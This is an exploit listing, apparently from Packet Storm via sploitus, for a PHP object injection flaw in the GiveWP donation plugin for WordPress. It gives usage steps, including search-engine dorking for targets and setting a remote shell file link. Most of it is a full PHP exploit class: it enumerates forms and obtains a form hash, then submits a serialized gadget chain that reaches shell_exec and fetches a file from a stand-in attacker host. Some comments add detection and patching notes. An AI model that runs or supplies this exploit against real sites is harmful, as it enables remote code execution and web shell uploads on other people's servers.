## https://sploitus.com/exploit?id=PACKETSTORM:181985
=============================================================================================================================================  
| # Title : WordPress GiveWP Donation Fundraising Platform 3.14.1 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://givewp.com/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking In Google Or Other Search Engine.  
  
[+] The following php code Upload shell file from external link.  
  
[+] Line 78 set your file link.  
  
[+] Line 127. set your target.  
  
[+] save code as poc.php .  
  
[+] Usage : cmd = php poc.php .  
  
[+] PayLoad :  
  
  
<?php  
/**
 * Proof-of-concept client for the GiveWP issue described on this page.
 *
 * Observable request sequence — every call is a POST to <target>/wp-admin/admin-ajax.php:
 *   1. action=give_form_search          -> JSON list of donation forms         (check())
 *   2. action=give_donation_form_nonce  -> per-form hash returned under 'data'  (retrieveAndAnalyzeForm())
 *   3. action=give_process_donation     -> donation submission whose give_title
 *                                          field carries a PHP-serialized object
 *                                          graph instead of a title               (sendExploitRequest())
 *
 * Defender notes: the page labels this "php code injection", but what the code actually
 * submits is serialized-object notation (O:<len>:"Class":...), i.e. a PHP object
 * injection / insecure-deserialization vector. Step 3 is the detection point: a donation
 * POST whose donor fields (give_title, give_first, ...) contain `O:` / `\0*\0` serialized
 * syntax is not something a normal donor enters, so it is a clean WAF/log signature on
 * admin-ajax.php. Mitigation is updating GiveWP beyond the affected release named on the
 * page and rejecting serialized syntax in form input. Transport is plain PHP streams
 * (file_get_contents) with no TLS options configured; the sample target is http://.
 */
class GiveWPExploit {
// Base URL of the site under test, without a trailing slash (paths are appended below).
private $targetUrl;
// Request headers sent with every POST; only the form-urlencoded content type is set.
private $headers;

/**
 * @param string $targetUrl site base URL, e.g. 'http://127.0.0.1' (no trailing slash)
 */
public function __construct($targetUrl) {
$this->targetUrl = $targetUrl;
$this->headers = array(
'Content-Type: application/x-www-form-urlencoded'
);
}

/**
 * Step 1: lists donation forms via the give_form_search AJAX action.
 *
 * Returns the decoded form list (an array) on success, or false when the request
 * fails, the status is not 200, or the body decodes to an empty/invalid value
 * (json_decode returns null on invalid JSON, which empty() also catches).
 * NOTE(review): array_column(..., 'id') assumes each element is an array with an
 * 'id' key — the response schema is not verified here.
 */
public function check() {
$response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array('action' => 'give_form_search'));
if (!$response || $response['http_code'] != 200) {
echo "Failed to retrieve form list.\n";
return false;
}

$forms = json_decode($response['body'], true);
if (empty($forms)) {
echo "No forms found.\n";
return false;
}

echo "Successfully retrieved form list. Available Form IDs: " . implode(', ', array_column($forms, 'id')) . "\n";
return $forms;
}

/**
 * Driver: runs check(), picks one form at random (array_rand), fetches its hash,
 * then submits the crafted donation. Prints progress to stdout and returns nothing.
 */
public function exploit() {
$forms = $this->check();
if (!$forms) {
return;
}

// array_rand returns a single key here (default num=1), so this picks one form.
$selectedForm = $forms[array_rand($forms)];
$validForm = $this->retrieveAndAnalyzeForm($selectedForm['id']);

if (!$validForm) {
echo "Failed to retrieve a valid form for exploitation.\n";
return;
}

echo "Using Form ID: " . $validForm['give_form_id'] . " for exploitation.\n";
$this->sendExploitRequest($validForm);
}

/**
 * Step 2: requests the form hash via give_donation_form_nonce for one form id.
 *
 * Returns an associative array with give_form_id / give_form_hash / give_price_id /
 * give_amount, or false when the request fails, the status is not 200, or the
 * response carries no 'data' value.
 * NOTE(review): reading $formData['data'] assumes the JSON body is an object with a
 * 'data' key; on a different shape PHP 8 emits an "Undefined array key" warning
 * before the falsy check below returns false.
 */
private function retrieveAndAnalyzeForm($formId) {
$response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array(
'action' => 'give_donation_form_nonce',
'give_form_id' => $formId
));

if (!$response || $response['http_code'] != 200) {
return false;
}

$formData = json_decode($response['body'], true);
$giveFormId = $formId;
$giveFormHash = $formData['data'];
$givePriceId = '0'; // Default price ID
$giveAmount = '$10.00'; // Default amount (single-quoted, so the '$' is a literal character)

if (!$giveFormHash) {
return false;
}

return array(
'give_form_id' => $giveFormId,
'give_form_hash' => $giveFormHash,
'give_price_id' => $givePriceId,
'give_amount' => $giveAmount
);
}

/**
 * Step 3: submits a give_process_donation request with the 'offline' gateway and a
 * serialized object graph in the give_title field. The response is discarded, so
 * the caller gets no indication of whether the server accepted or rejected it.
 */
private function sendExploitRequest($validForm) {
// URL of the malicious file to be fetched — a hard-coded placeholder that becomes the
// innermost string value of the serialized payload below.
$remoteFileUrl = 'http://attacker-server.com/malicious-file.php';

// Payload that uses file_get_contents to fetch the remote file.
// This is a PHP-serialized object string (gadget chain through Stripe / Give classes),
// not injected PHP source; sprintf fills in the string length and the URL. In a
// single-quoted literal, '\\\\' yields two backslashes and '\\0' yields a backslash
// followed by '0', exactly as written — no escape processing happens at runtime.
$payload = sprintf(
'O:19:"Stripe\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\Vendors\\\\Faker\\\\ValidGenerator":3:{s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\Onboarding\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%d:"%s";}}}}}}}}',
strlen($remoteFileUrl),
$remoteFileUrl
);

// Ordinary donation fields plus the payload in give_title. From a detection standpoint
// this is the anomalous request: donor text fields carrying serialized-object syntax.
$data = array(
'give-form-id' => $validForm['give_form_id'],
'give-form-hash' => $validForm['give_form_hash'],
'give-price-id' => $validForm['give_price_id'],
'give-amount' => $validForm['give_amount'],
'give_first' => 'Test',
'give_last' => 'User',
'give_email' => 'test@example.com',
'give_title' => $payload,
'give-gateway' => 'offline',
'action' => 'give_process_donation'
);

$this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', $data);
}

/**
 * Sends one form-urlencoded request through the PHP HTTP stream wrapper.
 *
 * @param string $method HTTP method passed to the stream context
 * @param string $url    absolute URL
 * @param array  $data   form fields, encoded with http_build_query
 * @return array|false  ['http_code' => int, 'body' => string], or false when
 *                      file_get_contents fails. Because 'ignore_errors' is not set,
 *                      the wrapper treats non-2xx responses as failures (it also emits a
 *                      warning), so http_code is effectively only parsed for successes.
 */
private function sendRequest($method, $url, $data) {
$options = array(
'http' => array(
'method' => $method,
'header' => implode("\r\n", $this->headers),
'content' => http_build_query($data)
)
);

$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);

if ($result === false) {
return false;
}

// $http_response_header is populated by the HTTP wrapper in the calling scope after a
// successful file_get_contents; [0] is the status line ("HTTP/1.1 200 OK"), and offset 9
// with length 3 is the status code.
return array(
'http_code' => (int) substr($http_response_header[0], 9, 3), // Get the HTTP code
'body' => $result
);
}
}
  
// Usage  
// Loopback placeholder target from the page.
$target = 'http://127.0.0.1';
$exploit = new GiveWPExploit($target);
$exploit->exploit();
?>  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================